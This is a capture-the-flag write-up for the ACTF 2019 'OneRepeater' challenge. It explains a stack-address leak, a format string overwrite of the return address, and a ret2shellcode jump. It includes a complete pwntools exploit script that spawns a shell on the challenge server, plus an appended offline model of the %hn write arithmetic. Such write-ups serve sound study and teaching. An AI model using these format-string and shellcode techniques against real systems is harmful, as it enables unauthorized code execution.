<!-- wp:paragraph -->
<p>This is a simple format string + ret2shellcode challenge.</p>
<!-- /wp:paragraph -->

<!-- wp:image {"align":"center","id":663,"sizeSlug":"large"} -->
<div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201128132646.png" alt="" class="wp-image-663" style=""></figure></div>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>NX is disabled, so this is basically a shellcode problem.</p>
<!-- /wp:paragraph -->

<!-- wp:image {"align":"center","id":664,"sizeSlug":"large"} -->
<div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201128132735.png" alt="" class="wp-image-664" style=""></figure></div>
<!-- /wp:image -->

<!-- wp:image {"id":665,"sizeSlug":"large"} -->
<figure class="wp-block-image size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201128132744.png" alt="" class="wp-image-665" style=""></figure>
<!-- /wp:image -->

<!-- wp:image {"id":666,"sizeSlug":"large"} -->
<figure class="wp-block-image size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201128132751.png" alt="" class="wp-image-666" style=""></figure>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>From this we can see that the program prints a stack address directly, and that there is also a format string vulnerability which gives an arbitrary-address overwrite. That solves the problem that buf is 0x408 bytes while read only reads 0x400 bytes, so a stack overflow is impossible; instead, the return address can be modified through the format string. We also have to pay attention to the puts call before the return:</p>
<!-- /wp:paragraph -->

<!-- wp:image {"align":"center","id":668,"sizeSlug":"large"} -->
<div class="wp-block-image"><figure class="aligncenter size-large"><img src="https://www.cjovi.icu/usr/uploads/2020/11/QQ截图20201128133843.png" alt="" class="wp-image-668" style=""></figure></div>
<!-- /wp:image -->

<!-- wp:paragraph -->
<p>To print that string it adds 0x10 to esp, so the stack address at the final ret is the leaked stack_addr + 0x408 + 0x10 + 4. With that we can write the payload.</p>
<!-- /wp:paragraph -->

<!-- wp:code -->
<pre class="wp-block-code"><code>from pwn import *
context(log_level = 'debug', arch = 'i386', os = 'linux')
#sh = process("./ACTF_2019_OneRepeater")
sh = remote("node3.buuoj.cn", "26621")

# Option 1 reads into buf; the program then prints a stack address, which we parse
sh.sendlineafter("3) Exit\n", "1")
stack_addr = int((sh.recv()[0:8]), base = 16)
print hex(stack_addr)
sh.sendline("break")

# Slot of the saved return address: buf (0x408) + the 0x10 esp adjustment for puts + 4
ret_addr = stack_addr + 0x418 + 4

# First write: low 16 bits of stack_addr into ret_addr via %hn.
# The 4 bytes of p32(ret_addr) already count as printed characters, hence the -4.
# Option 1 stores the payload in buf, option 2 passes buf to printf.
payload = p32(ret_addr) + '%' + str(stack_addr % 65536 - 4) + 'c' + "%16$hn"
sh.sendlineafter("3) Exit\n", "1")
sh.sendline(payload)
sh.sendlineafter("3) Exit\n", "2")

# Second write: high 16 bits of stack_addr into ret_addr + 2
payload = p32(ret_addr + 2) + '%' + str(stack_addr // 65536 - 4) + 'c' + "%16$hn"
sh.sendlineafter("3) Exit\n", "1")
sh.sendline(payload)
sh.sendlineafter("3) Exit\n", "2")

# Place the shellcode in buf, then exit so the overwritten ret lands on the leaked address
sh.sendlineafter("3) Exit\n", "1")
sh.sendline(asm(shellcraft.sh()))
sh.sendlineafter("3) Exit\n", "3")
sh.interactive()
</code></pre>
<!-- /wp:code -->

<!-- wp:paragraph -->
<p>The main thing in this challenge is to notice the change in esp at the end. Not noticing it kept me confused for a long time; the lesson is simply to observe carefully.</p>
<!-- /wp:paragraph -->
Last modified: 30 December 2020. © Reposting permitted with proper attribution.
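<p>As an added example (not the write-up's own code, and needing no pwntools), the following models the two-step %hn overwrite and the ret-slot offset used in the script above, so the arithmetic can be checked offline. It generalizes the write-up's calculation to halves smaller than the 4-byte address prefix; the sample addresses in the test are constructed.</p>

```python
import struct

# Added example, not the write-up's own code: models the two-step %hn
# overwrite from the script above and checks its arithmetic offline.
# Offsets come from the write-up; all addresses used with it are constructed.

RET_OFFSET = 0x408 + 0x10 + 4   # buf size + esp adjustment for puts + 4
PREFIX_LEN = 4                  # p32(addr) at the start of every payload


def ret_slot(stack_addr):
    """Address of the saved return address, as derived in the write-up."""
    return stack_addr + RET_OFFSET


def hn_plan(where, what):
    """Two (addr, width) pairs that write the 32-bit value `what` to `where`
    with %hn, two bytes per printf call. %hn stores the number of characters
    printed so far, so width = half - PREFIX_LEN. Halves smaller than the
    prefix wrap modulo 0x10000 (only the low 16 bits of the count are kept),
    and a width of 0 is avoided because "%0c" would still print one char."""
    lo, hi = what & 0xffff, (what >> 16) & 0xffff
    plan = []
    for addr, half in ((where, lo), (where + 2, hi)):
        width = (half - PREFIX_LEN) % 0x10000
        if width == 0:
            width = 0x10000
        plan.append((addr, width))
    return plan


def format_payload(addr, width, argpos=16):
    """Bytes the script sends for one write: p32(addr) + '%<width>c%16$hn'."""
    return (struct.pack("<I", addr) + b"%" + str(width).encode()
            + b"c%" + str(argpos).encode() + b"$hn")


def simulate(plan, mem=None):
    """Apply each write as printf would: PREFIX_LEN + width characters are
    printed, and %hn stores the low 16 bits of that count at addr (LE)."""
    mem = {} if mem is None else mem
    for addr, width in plan:
        count = PREFIX_LEN + width
        mem[addr] = count & 0xff
        mem[addr + 1] = (count >> 8) & 0xff
    return mem


def read_dword(mem, addr):
    """Little-endian 32-bit read from the simulated memory."""
    return sum(mem.get(addr + i, 0) << (8 * i) for i in range(4))
```

Running `read_dword(simulate(hn_plan(ret_slot(s), s)), ret_slot(s))` for a leaked address `s` should give `s` back, which is exactly what the two payloads in the script rely on.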